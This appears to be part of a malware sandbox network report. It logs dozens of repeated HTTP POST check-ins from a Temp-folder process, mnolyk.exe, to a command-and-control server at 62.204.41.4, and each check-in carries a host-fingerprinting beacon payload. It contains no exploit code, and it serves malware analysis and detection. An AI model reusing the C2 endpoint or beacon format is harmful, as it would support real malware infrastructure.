                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:09.590598106 CET | 821 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      707 | 192.168.2.7 | 50402 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:09.761332035 CET | 822 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:09.824311018 CET | 822 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      708 | 192.168.2.7 | 50403 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:09.998023987 CET | 823 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:10.062766075 CET | 823 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      709 | 192.168.2.7 | 50404 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:10.231347084 CET | 824 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:10.293638945 CET | 824 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      71 | 192.168.2.7 | 49766 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:19.651200056 CET | 186 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:19.715879917 CET | 186 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      710 | 192.168.2.7 | 50405 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:10.475955963 CET | 825 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:10.544022083 CET | 825 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      711 | 192.168.2.7 | 50406 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:10.747493029 CET | 826 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:10.812560081 CET | 826 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      712 | 192.168.2.7 | 50407 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:11.016581059 CET | 827 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:11.081345081 CET | 827 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      713 | 192.168.2.7 | 50408 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:11.262816906 CET | 828 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:11.327658892 CET | 828 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      714 | 192.168.2.7 | 50409 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:11.502083063 CET | 829 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:11.566924095 CET | 829 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      715 | 192.168.2.7 | 50410 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:11.734232903 CET | 830 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:11.797760963 CET | 830 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      716 | 192.168.2.7 | 50411 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:11.977608919 CET | 831 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:12.044487953 CET | 831 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      717 | 192.168.2.7 | 50412 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:12.220069885 CET | 832 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:12.284826994 CET | 832 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      718 | 192.168.2.7 | 50413 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:12.452914953 CET | 833 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:12.518393040 CET | 833 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      719 | 192.168.2.7 | 50414 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:12.687094927 CET | 834 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:12.749799967 CET | 834 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      72 | 192.168.2.7 | 49767 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:19.936779976 CET | 187 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:20.000106096 CET | 187 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      720 | 192.168.2.7 | 50415 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:12.934992075 CET | 835 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:10:12.998701096 CET | 835 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
721 | 192.168.2.7 | 50416 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:10:13.181627035 CET | 836 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:10:13.246825933 CET | 836 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
722 | 192.168.2.7 | 50417 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:10:13.425467968 CET | 837 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:10:13.488778114 CET | 837 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
723 | 192.168.2.7 | 50418 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
